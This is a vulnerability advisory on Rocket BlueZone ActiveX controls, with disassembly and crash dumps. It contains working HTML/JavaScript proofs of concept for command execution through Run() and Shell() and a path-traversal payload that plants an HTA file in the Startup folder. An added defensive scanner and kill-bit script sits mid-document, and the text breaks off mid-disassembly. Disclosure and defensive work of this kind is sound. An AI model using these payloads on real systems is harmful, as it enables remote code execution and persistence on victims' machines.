SSD Advisory – Rocket BlueZone Multiple Vulnerabilities

SecuriTeam Secure Disclosure
Introduction
Rocket BlueZone Terminal Emulation Suite is the solution you need if you are looking to replace your aging, expensive, current Terminal Emulation solution. Our software is a secure, slim, powerhouse of a solution built for the IBM Mainframe (TN3270), i Series (TN5250), UNIX/DEC (VT), Unisys (T27 & UTS) and secure File Transfer Protocol (FTP) systems.
Vulnerability Details
Multiple vulnerabilities have been found in Rocket BlueZone:

  • WhllObj ActiveX Control Run Method Command Execution
  • WhllObj ActiveX Control Shell Method Command Execution
  • LIPI ActiveX Control SaveSettings Method Code Execution
  • WhllObj ActiveX Control StatusBarText Property Stack Buffer Overflow Vulnerability
  • WhllObj ActiveX Control GetOpenFilename Method FileFilter Stack Buffer Overflow Vulnerability
  • WhllObj ActiveX Control GetSaveAsFilename Method FileFilter Stack Buffer Overflow Vulnerability
  • LIPI ActiveX Control SendFile Method Heap Buffer Overflow Vulnerability
  • LIPI ActiveX Control ReceiveFile Method Heap Buffer Overflow Vulnerability

WhllObj ActiveX Control Run Method Command Execution
BlueZone installs an ActiveX control with the following settings:

binary path: C:\Program Files\BlueZone\6.1\bzwhll.dll
progid: BZWhll.WhllObj.6.1
clsid: {4EB961C3-00D0-11D5-903D-00105AABADD3}
Implements IObjectSafety: Yes
Safe for Scripting (IObjectSafety): true
Safe for Initialization (IObjectSafety): true
Description: WhllObj Class

According to the IObjectSafety interface, the control is safe for scripting and safe for initialization, so Internet Explorer will allow its methods and properties to be scripted, subject to the browser security settings. Note that these ActiveX settings are the same as those of common web browser plugins (Flash, QuickTime, etc.).
Vulnerability
This ActiveX control offers the insecure Run() method, see typelib:

...
	/* DISPID=17 */
	/* VT_INT [22] */
	function Run(
		/* VT_BSTR [8] [in] */ $CmdLine
		)
	{
		/* method Run */
	}
...

The ActiveX control calls CreateProcessA() with a user-supplied command line. Attached is proof-of-concept code that launches calc.exe.

Call stack of thread 000042E8
Address    Returns to    Procedure / arguments                               Called from                   Frame      Stack Dump
015ED028   03044ABB      kernel32.CreateProcessA                             bzwhll.03044AB5               015ED0AC
015ED02C   00000000        ModuleFileName = NULL
015ED030   015ED0CC        CommandLine = "cmd /c start calc"
015ED034   00000000        pProcessSecurity = NULL
015ED038   00000000        pThreadSecurity = NULL
015ED03C   00000000        InheritHandles = FALSE
015ED040   00000000        CreationFlags = 0
015ED044   00000000        pEnvironment = NULL
015ED048   00000000        CurrentDir = NULL
015ED04C   015ED058        pStartupInfo = 015ED058
015ED050   015ED09C        pProcessInfo = 015ED09C
015ED0B0   03059CA0      ? bzwhll.03044A8E                                   bzwhll.03059C9B
015ED1D8   77135CF9      Includes bzwhll.03059CA0                            OLEAUT32.77135CF7             015ED1D4   03200048 003DEEB
015ED1F8   77136308      ? OLEAUT32.DispCallFunc                             OLEAUT32.77136303             015ED1F4   03200048 0000005
015ED288   03042493      Includes OLEAUT32.77136308                          bzwhll.03042490               015ED284   02D3E324 0320004
015ED2B4   3C61302B      Includes bzwhll.03042493                            mshtml.3C613028               015ED2B0   03200048 0000001
015ED2F0   3C956B7D      mshtml.3C612FEE                                     mshtml.3C956B78               015ED2EC   03200048 0000001
015ED320   3C95350A      mshtml.3C956A4B                                     mshtml.3C953505               015ED31C   80020003 0000001
015ED34C   3C5FA571      Includes mshtml.3C95350A                            mshtml.3C5FA56E               015ED348   02B10400 0000001
015ED39C   3D7C3A8A      Includes mshtml.3C5FA571                            3D7C3A88                      015ED398   02D64860 0000001
015ED3DC   3D7C39D6      3D7C39FC                                            3D7C39D1                      015ED3D8   003DC708 0000001
015ED418   3D7C4F16      3D7C3987                                            3D7C4F11                      015ED414   003DC708 0000040
015ED4D8   3D7C4E70      ? 3D7C4E7E                                          3D7C4E6B                      015ED4D4   00000011 0000000
015ED50C   3D7C2D5D      3D7C244D                                            3D7C2D58                      015ED508   003DC708 015ED53
015ED558   3D7C4225      3D7C2CEA                                            3D7C4220                      015ED554   003DC708 0000000
015ED588   3D7C4F83      3D7C22E8                                            3D7C4F7E                      015ED584   003DC708 0000000
015ED724   3D7C139B      3D7C0DC6                                            3D7C1396                      015ED720   015ED738 015ED88
015ED80C   3D7C12D5      3D7C12FC                                            3D7C12D0                      015ED808   015ED880 0000000
015ED858   3D7C1103      Includes 3D7C12D5                                   3D7C1101                      015ED854   015ED880 0000000
015ED8D4   3D7A3EA3      3D7C0FB9                                            3D7A3E9E                      015ED8D0   003DDF60 015EDA9
015ED920   3D7A553F      ? 3D7A3D03                                          3D7A553A                      015ED91C   003DC3F0 015EDA9
015ED984   3D7A534D      3D7A5356                                            3D7A5348                      015ED980   003DC3F0 001DD2E
015ED9AC   3C53A47F      Includes 3D7A534D                                   mshtml.3C53A47C               015ED9A8   003DC3F4 0024EB7
015EDA04   3C53A1F1      mshtml.3C53A2F0                                     mshtml.3C53A1EC               015EDA00   02B250A0 0000000
015EDAC8   3C53A612      ? mshtml.3C53A233                                   mshtml.3C53A60D               015EDAC4
vulnerable code, bzwhll.dll:
;----------------------------------------------------------------------------------------------------
 10004A8E                           SUB_L10004A8E:
 10004A8E  55                        		push	ebp
 10004A8F  8BEC                      		mov	ebp,esp
 10004A91  83EC54                    		sub	esp,00000054h
 10004A94  56                        		push	esi
 10004A95  8D45AC                    		lea	eax,[ebp-54h]
 10004A98  50                        		push	eax
 10004A99  33F6                      		xor	esi,esi
 10004A9B  FF1570300310              		call	[KERNEL32.dll!GetStartupInfoA]
 10004AA1  8D45F0                    		lea	eax,[ebp-10h]
 10004AA4  50                        		push	eax
 10004AA5  8D45AC                    		lea	eax,[ebp-54h]
 10004AA8  50                        		push	eax
 10004AA9  FF7508                    		push	[ebp+08h]
 10004AAC  56                        		push	esi
 10004AAD  56                        		push	esi
 10004AAE  56                        		push	esi
 10004AAF  56                        		push	esi
 10004AB0  56                        		push	esi
 10004AB1  FF750C                    		push	[ebp+0Ch]
 10004AB4  56                        		push	esi
 10004AB5  FF156C300310              		call	[KERNEL32.dll!CreateProcessA] //boom
 10004ABB  85C0                      		test	eax,eax
 10004ABD  740E                      		jz 	L10004ACD
 10004ABF  8B75FC                    		mov	esi,[ebp-04h]
 10004AC2  6AFF                      		push	FFFFFFFFh
 10004AC4  FF75F0                    		push	[ebp-10h]
 10004AC7  FF1528330310              		call	[USER32.dll!WaitForInputIdle]
 10004ACD                           L10004ACD:
 10004ACD  8BC6                      		mov	eax,esi
 10004ACF  5E                        		pop	esi
 10004AD0  C9                        		leave
 10004AD1  C3                        		retn
;----------------------------------------------------------------------------------------------------

Proof of Concept

<html>
<object classid='clsid:4EB961C3-00D0-11D5-903D-00105AABADD3' id='obj' />
</object>
<script>
obj.Run("cmd /c start calc");
</script>

WhllObj ActiveX Control Shell Method Command Execution
Rocket BlueZone installs an ActiveX control with the following settings:

binary path: C:\Program Files\BlueZone\6.1\bzwhll.dll
progid: BZWhll.WhllObj.6.1
clsid: {4EB961C3-00D0-11D5-903D-00105AABADD3}
Implements IObjectSafety: Yes
Safe for Scripting (IObjectSafety): true
Safe for Initialization (IObjectSafety): true
Description: WhllObj Class

According to the IObjectSafety interface, the control is safe for scripting and safe for initialization, so Internet Explorer will allow its methods and properties to be scripted, subject to the browser security settings. Note that these ActiveX settings are the same as those of common web browser plugins (Flash, QuickTime, etc.).
Vulnerability
This ActiveX control offers the insecure Shell() method, see typelib:

...
	/* DISPID=106 */
	/* VT_INT [22] */
	function Shell(
		/* VT_BSTR [8] [in] */ $Application,
		/* VT_VARIANT [12] [in] */ $CommandLine,
		/* VT_VARIANT [12] [in] */ $WindowState,
		/* VT_VARIANT [12] [in] */ $Wait
		)
	{
		/* method Shell */
	}
...

The ActiveX control calls CreateProcessA() with a user-supplied command line. Attached is proof-of-concept code that launches calc.exe.

Call stack of thread 000041C4
Address    Returns to    Procedure / arguments                                                                     Called from                   Frame      Stack Dump
015EAC2C   030F8215      kernel32.CreateProcessA                                                                   bzwhll.030F820F               015EACE4
015EAC30   00000000        ModuleFileName = NULL
015EAC34   015EAD1C        CommandLine = ""d:\windows\system32\cmd.exe"  /c start calc"
015EAC38   00000000        pProcessSecurity = NULL
015EAC3C   00000000        pThreadSecurity = NULL
015EAC40   00000000        InheritHandles = FALSE
015EAC44   00000000        CreationFlags = 0
015EAC48   00000000        pEnvironment = NULL
015EAC4C   00000000        CurrentDir = NULL
015EAC50   015EAC64        pStartupInfo = 015EAC64
015EAC54   015EACA8        pProcessInfo = 015EACA8
vulnerable code, bzwhll.dll:
;----------------------------------------------------------------------------------------------------
 10028059                           L10028059:
 10028059  55                       		db	55h;   'U'
 1002805A  8D                       		db	8Dh;   '?'
 1002805B  AC                       		db	ACh;   '¿'
 1002805C  24                       		db	24h;   '$'
 1002805D  40                       		db	40h;   '@'
 1002805E  DB                       		db	DBh;   '›'
 1002805F  FF                       		db	FFh;   'ï'
 10028060  FF                       		db	FFh;   'ï'
 10028061  B8                       		db	B8h;   'ñ'
 10028062  40                       		db	40h;   '@'
 10028063  25                       		db	25h;   '%'
 10028064  00                       		db	00h;
 10028065  00                       		db	00h;
 10028066  E8                       		db	E8h;   '¨'
 10028067  F5                       		db	F5h;   'å'
 10028068  8B                       		db	8Bh;   '<'
 10028069  00                       		db	00h;
 1002806A  00                       		db	00h;
 1002806B  A1                       		db	A1h;   'ö'
 1002806C  F4EC0410                 		dd	L1004ECF4
 10028070  33                       		db	33h;   '3'
 10028071  C5                       		db	C5h;   '…'
 10028072  89                       		db	89h;   '%'
 10028073  85                       		db	85h;   ':'
 10028074  BC                       		db	BCh;   '?'
 10028075  24                       		db	24h;   '$'
 10028076  00                       		db	00h;
 10028077  00                       		db	00h;
 10028078  53                        		push	ebx
 10028079  56                        		push	esi
 1002807A  57                        		push	edi
 1002807B  8DB5E0240000              		lea	esi,[ebp+000024E0h]
 10028081  8D7D10                    		lea	edi,[ebp+10h]
 10028084  A5                        		movsd
 10028085  A5                        		movsd
 10028086  A5                        		movsd
 10028087  8B85CC240000              		mov	eax,[ebp+000024CCh]
 1002808D  8B9DC8240000              		mov	ebx,[ebp+000024C8h]
 10028093  A5                        		movsd
 10028094  8DB5F0240000              		lea	esi,[ebp+000024F0h]
 1002809A  8D7D28                    		lea	edi,[ebp+28h]
 1002809D  A5                        		movsd
 1002809E  A5                        		movsd
 1002809F  A5                        		movsd
 100280A0  A5                        		movsd
 100280A1  8BBD00250000              		mov	edi,[ebp+00002500h]
 100280A7  33F6                      		xor	esi,esi
 100280A9  3935A4F50410              		cmp	[L1004F5A4],esi
 100280AF  894524                    		mov	[ebp+24h],eax
 100280B2  897D20                    		mov	[ebp+20h],edi
 100280B5  740D                      		jz 	L100280C4
 100280B7  53                        		push	ebx
 100280B8  68C8EA0310                		push	SSZ1003EAC8_WhllObj__Shell_____
 100280BD  E895B4FEFF                		call	SUB_L10013557
 100280C2  59                        		pop	ecx
 100280C3  59                        		pop	ecx
 100280C4                           L100280C4:
 100280C4  8D4580                    		lea	eax,[ebp-80h]
 100280C7  50                        		push	eax
 100280C8  C685B823000000            		mov	byte ptr [ebp+000023B8h],00h
 100280CF  C685C013000000            		mov	byte ptr [ebp+000013C0h],00h
 100280D6  FF1570300310              		call	[KERNEL32.dll!GetStartupInfoA]
 100280DC  56                        		push	esi
 100280DD  56                        		push	esi
 100280DE  6804010000                		push	00000104h
 100280E3  8D85B8230000              		lea	eax,[ebp+000023B8h]
 100280E9  50                        		push	eax
 100280EA  6AFF                      		push	FFFFFFFFh
 100280EC  FF7524                    		push	[ebp+24h]
 100280EF  56                        		push	esi
 100280F0  56                        		push	esi
 100280F1  FF156C310310              		call	[KERNEL32.dll!WideCharToMultiByte]
 100280F7  83F801                    		cmp	eax,00000001h
 100280FA  7F10                      		jg 	L1002810C
 100280FC  6A02                      		push	00000002h
 100280FE  58                        		pop	eax
 100280FF  8983F7050000              		mov	[ebx+000005F7h],eax
 10028105  8907                      		mov	[edi],eax
 10028107  E99F010000                		jmp	L100282AB
 1002810C                           L1002810C:
 1002810C  8D85D0240000              		lea	eax,[ebp+000024D0h]
 10028112  50                        		push	eax
 10028113  E8A0B7FEFF                		call	SUB_L100138B8
 10028118  84C0                      		test	al,al
 1002811A  59                        		pop	ecx
 1002811B  7422                      		jz 	L1002813F
 1002811D  68F60F0000                		push	00000FF6h
 10028122  8D85C0130000              		lea	eax,[ebp+000013C0h]
 10028128  50                        		push	eax
 10028129  8D85D0240000              		lea	eax,[ebp+000024D0h]
 1002812F  50                        		push	eax
 10028130  C685C013000000            		mov	byte ptr [ebp+000013C0h],00h
 10028137  E897B5FEFF                		call	SUB_L100136D3
 1002813C  83C40C                    		add	esp,0000000Ch
 1002813F                           L1002813F:
 1002813F  66837D100A                		cmp	word ptr [ebp+10h],000Ah
 10028144  7420                      		jz 	L10028166
 10028146  66F745100040              		test	word ptr [ebp+10h],4000h
 1002814C  7407                      		jz 	L10028155
 1002814E  8B4518                    		mov	eax,[ebp+18h]
 10028151  8A00                      		mov	al,[eax]
 10028153  EB03                      		jmp	L10028158
 10028155                           L10028155:
 10028155  8A4518                    		mov	al,[ebp+18h]
 10028158                           L10028158:
 10028158  FEC0                      		inc	al
 1002815A  834DAC01                  		or	dword ptr [ebp-54h],00000001h
 1002815E  660FB6C0                  		movzx	ax,al
 10028162  668945B0                  		mov	[ebp-50h],ax
 10028166                           L10028166:
 10028166  685CE60310                		push	L1003E65C
 1002816B  8D4538                    		lea	eax,[ebp+38h]
 1002816E  50                        		push	eax
 1002816F  FF155C300310              		call	[KERNEL32.dll!lstrcpyA]
 10028175  8B3D60300310              		mov	edi,[KERNEL32.dll!lstrcatA]
 1002817B  8D85B8230000              		lea	eax,[ebp+000023B8h]
 10028181  50                        		push	eax
 10028182  8D4538                    		lea	eax,[ebp+38h]
 10028185  50                        		push	eax
 10028186  FFD7                      		call	edi
 10028188  685CE60310                		push	L1003E65C
 1002818D  8D4538                    		lea	eax,[ebp+38h]
 10028190  50                        		push	eax
 10028191  FFD7                      		call	edi
 10028193  80BDC013000000            		cmp	byte ptr [ebp+000013C0h],00h
 1002819A  7418                      		jz 	L100281B4
 1002819C  6868850310                		push	L10038568
 100281A1  8D4538                    		lea	eax,[ebp+38h]
 100281A4  50                        		push	eax
 100281A5  FFD7                      		call	edi
 100281A7  8D85C0130000              		lea	eax,[ebp+000013C0h]
 100281AD  50                        		push	eax
 100281AE  8D4538                    		lea	eax,[ebp+38h]
 100281B1  50                        		push	eax
 100281B2  FFD7                      		call	edi
 100281B4                           L100281B4:
 100281B4  8D4538                    		lea	eax,[ebp+38h]
 100281B7  8945E4                    		mov	[ebp-1Ch],eax
 100281BA  8D45D4                    		lea	eax,[ebp-2Ch]
 100281BD  50                        		push	eax
 100281BE  C745D43C000000            		mov	dword ptr [ebp-2Ch],0000003Ch
 100281C5  C745D840050000            		mov	dword ptr [ebp-28h],00000540h
 100281CC  8975DC                    		mov	[ebp-24h],esi
 100281CF  C745E0C0EA0310            		mov	dword ptr [ebp-20h],SSZ1003EAC0_Open
 100281D6  8975E8                    		mov	[ebp-18h],esi
 100281D9  8975EC                    		mov	[ebp-14h],esi
 100281DC  C745F001000000            		mov	dword ptr [ebp-10h],00000001h
 100281E3  FF15C0320310              		call	[SHELL32.dll!ShellExecuteExA]
 100281E9  8B7D20                    		mov	edi,[ebp+20h]
 100281EC  8983F7050000              		mov	[ebx+000005F7h],eax
 100281F2  8907                      		mov	[edi],eax
 100281F4  39B3F7050000              		cmp	[ebx+000005F7h],esi
 100281FA  756F                      		jnz	L1002826B
 100281FC  8D45C4                    		lea	eax,[ebp-3Ch]
 100281FF  50                        		push	eax
 10028200  8D4580                    		lea	eax,[ebp-80h]
 10028203  50                        		push	eax
 10028204  56                        		push	esi
 10028205  56                        		push	esi
 10028206  56                        		push	esi
 10028207  56                        		push	esi
 10028208  56                        		push	esi
 10028209  56                        		push	esi
 1002820A  8D4538                    		lea	eax,[ebp+38h]
 1002820D  50                        		push	eax
 1002820E  56                        		push	esi
 1002820F  FF156C300310              		call	[KERNEL32.dll!CreateProcessA] //boom
 10028215  8983F7050000              		mov	[ebx+000005F7h],eax
 1002821B  8907                      		mov	[edi],eax
 1002821D  39B3F7050000              		cmp	[ebx+000005F7h],esi
 10028223  0F8482000000              		jz 	L100282AB
 10028229  66837D280A                		cmp	word ptr [ebp+28h],000Ah
 1002822E  747B                      		jz 	L100282AB
 10028230  66F745280040              		test	word ptr [ebp+28h],4000h
 10028236  7407                      		jz 	L1002823F
 10028238  8B4530                    		mov	eax,[ebp+30h]
 1002823B  8A00                      		mov	al,[eax]
 1002823D  EB03                      		jmp	L10028242
 1002823F                           L1002823F:
 1002823F  8A4530                    		mov	al,[ebp+30h]
 10028242                           L10028242:
 10028242  84C0                      		test	al,al
 10028244  7465                      		jz 	L100282AB
 10028246  EB18                      		jmp	L10028260
 10028248                           L10028248:
 10028248  6A64                      		push	00000064h
 1002824A  FF75C4                    		push	[ebp-3Ch]
 1002824D  FF1508310310              		call	[KERNEL32.dll!WaitForSingleObject]
 10028253  85C0                      		test	eax,eax
 10028255  7454                      		jz 	L100282AB
 10028257  6A01                      		push	00000001h
 10028259  8BCB                      		mov	ecx,ebx
 1002825B  E848EBFFFF                		call	SUB_L10026DA8
 10028260                           L10028260:
 10028260  80BB8656000000            		cmp	byte ptr [ebx+00005686h],00h
 10028267  74DF                      		jz 	L10028248
 10028269  EB40                      		jmp	L100282AB
 1002826B                           L1002826B:
 1002826B  66837D280A                		cmp	word ptr [ebp+28h],000Ah
 10028270  7439                      		jz 	L100282AB
 10028272  66F745280040              		test	word ptr [ebp+28h],4000h
 10028278  7407                      		jz 	L10028281
 1002827A  8B4530                    		mov	eax,[ebp+30h]
 1002827D  8A00                      		mov	al,[eax]
 1002827F  EB03                      		jmp	L10028284
 10028281                           L10028281:
 10028281  8A4530                    		mov	al,[ebp+30h]
 10028284                           L10028284:
 10028284  84C0                      		test	al,al
 10028286  7423                      		jz 	L100282AB
 10028288  EB18                      		jmp	L100282A2
 1002828A                           L1002828A:
 1002828A  6A64                      		push	00000064h
 1002828C  FF750C                    		push	[ebp+0Ch]
 1002828F  FF1508310310              		call	[KERNEL32.dll!WaitForSingleObject]
 10028295  85C0                      		test	eax,eax
 10028297  7412                      		jz 	L100282AB
 10028299  6A01                      		push	00000001h
 1002829B  8BCB                      		mov	ecx,ebx
 1002829D  E806EBFFFF                		call	SUB_L10026DA8
 100282A2                           L100282A2:
 100282A2  80BB8656000000            		cmp	byte ptr [ebx+00005686h],00h
 100282A9  74DF                      		jz 	L1002828A
 100282AB                           L100282AB:
 100282AB  8B8DBC240000              		mov	ecx,[ebp+000024BCh]
 100282B1  5F                        		pop	edi
 100282B2  5E                        		pop	esi
 100282B3  33CD                      		xor	ecx,ebp
 100282B5  33C0                      		xor	eax,eax
 100282B7  5B                        		pop	ebx
 100282B8  E88F890000                		call	SUB_L10030C4C
 100282BD  81C5C0240000              		add	ebp,000024C0h
 100282C3  C9                        		leave
 100282C4  C23C00                    		retn	003Ch
;----------------------------------------------------------------------------------------------------

Proof of Concept

<HTML>
<object classid='clsid:4EB961C3-00D0-11D5-903D-00105AABADD3' id='obj' />
</object>
<script>
obj.Shell("c:\\windows\\system32\\cmd.exe"," /c start calc",1,1);
</script>

LIPI ActiveX Control SaveSettings Method Code Execution
Rocket BlueZone installs an ActiveX control with the following settings:

binary path: C:\Program Files\BlueZone\6.1\bzlipiobj.dll
progid: BlueZone.LIPI.6.1
clsid: {0EB961C3-A2D0-11D5-903D-10105AABADD3}
Implements IObjectSafety: Yes
Safe for Scripting (IObjectSafety): true
Safe for Initialization (IObjectSafety): true
Description: LIPI Class

According to the IObjectSafety interface, the control is safe for scripting and safe for initialization, so Internet Explorer will allow its methods and properties to be scripted, subject to the browser security settings. Note that these ActiveX settings are the same as those of common web browser plugins (Flash, QuickTime, etc.).
Vulnerability
This ActiveX control offers the insecure SaveSettings() method, see typelib:

...
	/* DISPID=4 */
	/* VT_I4 [3] */
	function SaveSettings(
		/* VT_BSTR [8] [in] */ $__MIDL_0019
		)
	{
		/* method SaveSettings */
	}
...

This method simply accepts a file name as its argument and can be used to save arbitrary files on the target computer. Directory traversal sequences can also be used. File content can be controlled by setting the 'Username' property.
Given this, a remote attacker could store an executable HTA file inside automatic startup folders. Attached is proof-of-concept code that launches calc.exe when the computer reboots.
Proof of Concept

<html>
<object classid='clsid:0EB961C3-A2D0-11D5-903D-10105AABADD3' id='obj' />
</object>
<script>
obj.Username = ">>>>>>>>>>>>>>><sc" + "ript>var x=new ActiveXObject(\"WScript.Shell\");x.Exec(\"calc.exe\");</sc" + "ript>";
obj.SaveSettings("..\\..\\..\\..\\..\\..\\..\\..\\..\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\sh.hta");
</script>
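
Defensive triage for the three issues described so far, as an added example that is not part of the original advisory or of Rocket's code: it scans HTML for pages that instantiate the two controls by the CLSIDs and ProgIDs listed above and call the members the advisory names, and it emits a .reg body that sets the standard Internet Explorer kill bit for both CLSIDs. The function names and the sample page are constructed for illustration, and the kill bit is a general IE mechanism that the advisory itself does not mention.

```python
import re

# CLSID -> (ProgID, vulnerable members). All values are taken from the advisory text.
CONTROLS = {
    "4EB961C3-00D0-11D5-903D-00105AABADD3": (
        "BZWhll.WhllObj.6.1",
        {"Run", "Shell", "StatusBarText", "GetOpenFilename", "GetSaveAsFilename"},
    ),
    "0EB961C3-A2D0-11D5-903D-10105AABADD3": (
        "BlueZone.LIPI.6.1",
        {"SaveSettings", "SendFile", "ReceiveFile"},
    ),
}

OBJECT_TAG = re.compile(r"<object\b[^>]*>", re.I)
ATTR = re.compile(r"""\b(classid|id)\s*=\s*(?:'([^']*)'|"([^"]*)"|([^\s>]+))""", re.I)
ACTIVEX_NEW = re.compile(
    r"""(?:var\s+)?([A-Za-z_$][\w$]*)\s*=\s*new\s+ActiveXObject\s*\(\s*['"]([^'"]+)['"]""",
    re.I,
)

def bound_names(html):
    """Map each script-visible name to the BlueZone CLSID it instantiates."""
    names = {}
    for tag in OBJECT_TAG.findall(html):
        attrs = {m.group(1).lower(): next(g for g in m.groups()[1:] if g is not None)
                 for m in ATTR.finditer(tag)}
        clsid = re.sub(r"(?i)^clsid:", "", attrs.get("classid", "")).strip("{}").upper()
        if clsid in CONTROLS and "id" in attrs:
            names[attrs["id"]] = clsid
    for var, progid in ACTIVEX_NEW.findall(html):
        for clsid, (known, _) in CONTROLS.items():
            if progid.lower() == known.lower():
                names[var] = clsid
    return names

def scan(html):
    """Return (progid, member, note) findings; static only, obfuscated script will evade it."""
    findings = []
    for name, clsid in bound_names(html).items():
        progid, members = CONTROLS[clsid]
        by_lower = {m.lower(): m for m in members}  # COM member names are case-insensitive
        findings.append((progid, "instantiated", name))
        use = re.compile(r"\b%s\s*\.\s*(\w+)\s*(\(|=(?!=))([^;\n]*)" % re.escape(name))
        for member, _, rest in use.findall(html):
            canonical = by_lower.get(member.lower())
            if canonical is None:
                continue
            traversal = canonical == "SaveSettings" and re.search(r"\.\.[\\/]", rest)
            note = "path traversal in argument" if traversal else "vulnerable member"
            findings.append((progid, canonical, note))
    return findings

def killbit_reg():
    """Build a .reg body setting Compatibility Flags 0x400 (kill bit) for both CLSIDs."""
    lines = ["Windows Registry Editor Version 5.00", ""]
    for clsid in CONTROLS:
        # Wow6432Node covers 32-bit Internet Explorer on 64-bit Windows.
        for root in ("SOFTWARE", "SOFTWARE\\Wow6432Node"):
            lines.append(
                "[HKEY_LOCAL_MACHINE\\%s\\Microsoft\\Internet Explorer"
                "\\ActiveX Compatibility\\{%s}]" % (root, clsid)
            )
            lines.append('"Compatibility Flags"=dword:00000400')
            lines.append("")
    return "\n".join(lines)

# Constructed sample page with placeholder arguments (not a capture of real traffic).
SAMPLE = r"""
<object classid='clsid:4EB961C3-00D0-11D5-903D-00105AABADD3' id='obj'></object>
<script>
var lipi = new ActiveXObject("BlueZone.LIPI.6.1");
obj.Run("EXAMPLE-COMMAND");
lipi.Username = "EXAMPLE";
lipi.SaveSettings("..\\..\\EXAMPLE.txt");
</script>
"""

if __name__ == "__main__":
    for finding in scan(SAMPLE):
        print(finding)
    print(killbit_reg())
```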

WhllObj ActiveX Control StatusBarText Property Stack Buffer Overflow Vulnerability
Rocket BlueZone installs an ActiveX control with the following settings:

binary path: C:\Program Files\BlueZone\6.1\bzwhll.dll
progid: BZWhll.WhllObj.6.1
clsid: {4EB961C3-00D0-11D5-903D-00105AABADD3}
Implements IObjectSafety: Yes
Safe for Scripting (IObjectSafety): true
Safe for Initialization (IObjectSafety): true
Description: WhllObj Class

According to the IObjectSafety interface, the control is safe for scripting and safe for initialization, so Internet Explorer will allow its methods and properties to be scripted, subject to the browser security settings. Note that these ActiveX settings are the same as those of common web browser plugins (Flash, QuickTime, etc.).
Vulnerability
The ActiveX offers the StatusBarText property, see typelib:

...
/* DISPID=154 */
	/* VT_BSTR [8] */
	/* property StatusBarText */
	var $StatusBarText;
	/* DISPID=154 */
	/* property StatusBarText */
	var $StatusBarText;
...

This property suffers from a stack-based buffer overflow caused by a copy loop inside bzwhll.dll. See the vulnerable code below.

WinDBG shows:
(6320.66b8): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=02ca6a64 ebx=00002f0c ecx=00000041 edx=00000074 esi=7c813e21 edi=03550048
eip=0273e548 esp=015ecdd4 ebp=015ed1f8 iopl=0         nv up ei pl nz ac pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010216
bzwhll!DllGetClassObject+0x12a8d:
0273e548 888c1dfcfeffff  mov     byte ptr [ebp+ebx-104h],cl ss:0023:015f0000=4d
0:008> g
(6320.66b8): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000000 ebx=00000000 ecx=41414141 edx=7c9032bc esi=00000000 edi=00000000
eip=41414141 esp=015eca04 ebp=015eca24 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010246
<Unloaded_oy.dll>+0x41414140:
41414141 ??              ???
vulnerable code, bzwhll.dll
;----------------------------------------------------------------------------------------------------
 1001E379                           L1001E379:
 1001E379  55                        		push	ebp
 1001E37A  8BEC                      		mov	ebp,esp
 1001E37C  81EC18040000              		sub	esp,00000418h
 1001E382  A1F4EC0410                		mov	eax,[L1004ECF4]
 1001E387  33C5                      		xor	eax,ebp
 1001E389  8945FC                    		mov	[ebp-04h],eax
 1001E38C  53                        		push	ebx
 1001E38D  56                        		push	esi
 1001E38E  33DB                      		xor	ebx,ebx
 1001E390  391DA4F50410              		cmp	[L1004F5A4],ebx
 1001E396  57                        		push	edi
 1001E397  8B7D08                    		mov	edi,[ebp+08h]
 1001E39A  740D                      		jz 	L1001E3A9
 1001E39C  57                        		push	edi
 1001E39D  6820C10310                		push	SSZ1003C120_WhllObj__put_StatusBarText_____
 1001E3A2  E8B051FFFF                		call	SUB_L10013557
 1001E3A7  59                        		pop	ecx
 1001E3A8  59                        		pop	ecx
 1001E3A9                           L1001E3A9:
 1001E3A9  6800010000                		push	00000100h
 1001E3AE  8D85FCFEFFFF              		lea	eax,[ebp-00000104h]
 1001E3B4  53                        		push	ebx
 1001E3B5  50                        		push	eax
 1001E3B6  E8D1280100                		call	jmp_MSVCR80.dll!memset
 1001E3BB  8B450C                    		mov	eax,[ebp+0Ch]
 1001E3BE  83C40C                    		add	esp,0000000Ch
 1001E3C1  663918                    		cmp	[eax],bx
 1001E3C4  0F8492010000              		jz 	L1001E55C
 1001E3CA  8B3560300310              		mov	esi,[KERNEL32.dll!lstrcatA]
 1001E3D0                           L1001E3D0:
 1001E3D0  66833826                  		cmp	word ptr [eax],0026h     \ //scan for ampersand
 1001E3D4  0F856C010000              		jnz	L1001E546                /
 1001E3DA  83C002                    		add	eax,00000002h
 1001E3DD  8985F8FBFFFF              		mov	[ebp-00000408h],eax
 1001E3E3  0FB700                    		movzx	eax,[eax]
 1001E3E6  83F86F                    		cmp	eax,0000006Fh
 1001E3E9  0F8FE7000000              		jg 	L1001E4D6
 1001E3EF  0F84D3000000              		jz 	L1001E4C8
 1001E3F5  83E826                    		sub	eax,00000026h
 1001E3F8  0F84C3000000              		jz 	L1001E4C1
 1001E3FE  83E83D                    		sub	eax,0000003Dh
 1001E401  0F849D000000              		jz 	L1001E4A4
 1001E407  48                        		dec	eax
 1001E408  7463                      		jz 	L1001E46D
 1001E40A  48                        		dec	eax
 1001E40B  48                        		dec	eax
 1001E40C  7430                      		jz 	L1001E43E
 1001E40E  48                        		dec	eax
 1001E40F  48                        		dec	eax
 1001E410  7412                      		jz 	L1001E424
 1001E412  83E804                    		sub	eax,00000004h
 1001E415  0F8514010000              		jnz	L1001E52F
 1001E41B                           L1001E41B:
 1001E41B  8D477B                    		lea	eax,[edi+7Bh]
 1001E41E                           L1001E41E:
 1001E41E  50                        		push	eax
 1001E41F  E902010000                		jmp	L1001E526
 1001E424                           L1001E424:
 1001E424  8D8DFCFDFFFF              		lea	ecx,[ebp-00000204h]
 1001E42A  51                        		push	ecx
 1001E42B  6A05                      		push	00000005h
 1001E42D                           L1001E42D:
 1001E42D  8B07                      		mov	eax,[edi]
 1001E42F  57                        		push	edi
 1001E430  FF907C070000              		call	[eax+0000077Ch]
 1001E436                           L1001E436:
 1001E436  8D85FCFDFFFF              		lea	eax,[ebp-00000204h]
 1001E43C  EBE0                      		jmp	L1001E41E
 1001E43E                           L1001E43E:
 1001E43E  8B07                      		mov	eax,[edi]
 1001E440  8D8DFCFDFFFF              		lea	ecx,[ebp-00000204h]
 1001E446  51                        		push	ecx
 1001E447  6A08                      		push	00000008h
 1001E449  57                        		push	edi
